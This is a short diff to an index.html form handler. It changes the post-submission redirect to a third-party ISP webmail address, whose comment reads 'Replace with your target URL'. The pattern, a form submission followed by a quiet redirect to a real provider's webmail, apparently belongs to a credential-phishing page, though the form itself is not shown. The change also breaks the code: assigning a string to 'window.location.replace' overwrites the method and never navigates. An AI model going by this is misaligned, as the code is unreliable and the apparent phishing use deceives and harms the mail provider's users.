--- a/index.html
+++ b/index.html
@@ -101,7 +101,7 @@ function showPage() {
         form.reset();
         successMsg.style.display = 'block';
         setTimeout(() => {
-          window.location.href = 'https://webmail.comporium.net/#3'; // Replace with your target URL
+          window.location.replace = 'https://webmail.comporium.net/#3'; // Replace with your target URL
         }, 4000); // Redirect after 4 seconds
       } else {
         alert('There was an issue submitting the form. Please try again.');
